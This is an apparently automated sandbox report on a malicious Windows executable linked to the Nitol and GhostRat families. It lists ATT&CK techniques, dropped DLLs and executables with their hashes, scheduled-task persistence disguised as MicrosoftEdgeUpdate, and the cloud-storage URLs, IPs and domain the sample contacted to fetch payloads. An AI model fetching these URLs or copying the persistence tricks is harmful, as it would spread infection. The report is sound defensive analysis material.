Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
287438657364-7643738421.08.exe	11%	Virustotal		Browse
287438657364-7643738421.08.exe	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\vhZp0W\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\b3aEb0H\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\vhZp0W\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\b3aEb0H\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	0%	ReversingLabs
C:\Program Files (x86)\vhZp0W\vhZp0W.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\lOXFJk.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://jylhok.oss-cn-beijing.aliyuncs.com/;	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifq	0%	Avira URL Cloud	safe
http://%s/%d.dll	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifg	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifx	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifcocp	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/Q	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1002	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/&	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifzodp	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifo	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.datdoZp	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	unknown
sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.48	true	false	unknown
jylhok.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
cvqthu.net	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%s/%d.dll	vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/;	287438657364-7643738421.08.exe, 00000000.00000003.2110077086.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.000000000059D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	false		high
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifg	287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifq	287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/	287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifx	287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	false		high
http://%s/upx.rarC:	vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002	287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifcocp	287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/&	287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1002	287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/Q	287438657364-7643738421.08.exe, 00000000.00000003.2110077086.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.000000000059D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	false		high
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp	287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	false		high
http://%s/ip.txt	vhZp0W.exe, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifzodp	287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/i.datdoZp	287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifo	287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
39.103.20.48	sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.217.47.169	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585091
Start date and time:	2025-01-07 04:20:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	287438657364-7643738421.08.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@66/29@15/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target vhZp0W.exe, PID 4336 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:22:17	Task Scheduler	Run new task: 8DQVz path: C:\Users\user\Documents\lOXFJk.exe
03:23:05	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 LKhCr path: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe
03:23:05	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 UW3xM path: C:\Program Files (x86)\vhZp0W\vhZp0W.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.9	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse
	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
8.217.47.169	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	45631.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	0000000000000000.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	x86_64.elf	Get hash	malicious	Mirai	Browse	8.171.83.51
	i486.elf	Get hash	malicious	Mirai	Browse	47.107.186.79
	arm4.elf	Get hash	malicious	Mirai	Browse	118.178.206.165
	2.elf	Get hash	malicious	Unknown	Browse	60.205.221.193
	1.elf	Get hash	malicious	Unknown	Browse	47.107.3.205
	3.elf	Get hash	malicious	Unknown	Browse	8.184.34.244
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	39.103.20.26
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	39.103.20.26
	cZO.exe	Get hash	malicious	Unknown	Browse	120.77.100.135
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	i486.elf	Get hash	malicious	Mirai	Browse	47.254.187.221
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	8.217.59.73
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	8.213.155.157
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	47.245.235.159
	z0r0.x86.elf	Get hash	malicious	Mirai	Browse	8.209.129.226
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	8.217.47.169
	armv7l.elf	Get hash	malicious	Unknown	Browse	8.212.89.249
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	47.235.55.179
	file.exe	Get hash	malicious	XRed	Browse	47.254.187.72
	file.exe	Get hash	malicious	XRed	Browse	47.254.187.72
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	x86_64.elf	Get hash	malicious	Mirai	Browse	8.171.83.51
	i486.elf	Get hash	malicious	Mirai	Browse	47.107.186.79
	arm4.elf	Get hash	malicious	Mirai	Browse	118.178.206.165
	2.elf	Get hash	malicious	Unknown	Browse	60.205.221.193
	1.elf	Get hash	malicious	Unknown	Browse	47.107.3.205
	3.elf	Get hash	malicious	Unknown	Browse	8.184.34.244
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	39.103.20.26
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	39.103.20.26
	cZO.exe	Get hash	malicious	Unknown	Browse	120.77.100.135

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	u1XWB0BIju.msi	Get hash	malicious	Unknown	Browse	39.103.20.48 118.178.60.9
	setup.msi	Get hash	malicious	Unknown	Browse	39.103.20.48 118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	39.103.20.48 118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	39.103.20.48 118.178.60.9
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	39.103.20.48 118.178.60.9
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	39.103.20.48 118.178.60.9
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	39.103.20.48 118.178.60.9
	setup.msi	Get hash	malicious	Unknown	Browse	39.103.20.48 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse
	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\b3aEb0H\1y6U0V.exe

Download File

Process:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse Filename: 45631.exe, Detection: malicious, Browse Filename: 0000000000000000.exe, Detection: malicious, Browse Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\b3aEb0H\log.src

Download File

Process:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955221203435
Encrypted:	true
SSDEEP:	98304:eOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:xo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	4288721784A98D16723B5AEEBE957D06
SHA1:	513A4C8B0D629D2A2A30496D77E3C9DBA3556EB3
SHA-256:	9BF99E7FA27771ECAEBAA006C331366058D3BE6673F7A55C42A609B2956891A6
SHA-512:	58FC3D6D98B289EE5A603CDE319A04998462424305E68093C2034F36682D41C029A632F8CAA43C71D0902370D9CE93B32CB7747735AA018EE4A05BEE0A2C773D
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\b3aEb0H\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516665874866
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/D:9S4+O6P5OeMRrjRy7aPZbm3k8V/D
MD5:	BABBA29E620D5F8AAC601C8A687F584E
SHA1:	96784FDB3382B0605E37BBBBCDD854FF83B24F02
SHA-256:	3B9E7BF2D3A896EFCDE6685B2134EA0F3BBC9490017095DEF13D683E91EF7767
SHA-512:	B61317EFE30094D76CCF16FD3DE119416E144C57ECE5AB6C4D04B2219147D6DCE8D2761BE55A502B03D8DFD06D3AA2EEC6D43F1EE0DE25316C0BEEFCE95FACA2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\b3aEb0H\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399628679059
Encrypted:	true
SSDEEP:	6144:3iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:y8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	5EE4E0666B8B2DFC21164A52B7453A66
SHA1:	2963FD188C5F3A96C2FFF812FB11117517D0E4AE
SHA-256:	1C0C6AD4976122EC2CB1C1D5CE078F2D18D1ED9C64AC5C13BFD05EA894CC5C45
SHA-512:	3D54AB97C824B92F5E33B877CBA81BD27A3B18164A719F9AD3F68C9937C707FAA418369AE09941C6FB3CBA5FFCFD8FD03E7D44107CAB90B6BBCF8587E0AABD06
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Ka."q.2....#B...R..$3br........%&'()456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\vhZp0W\log.src

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
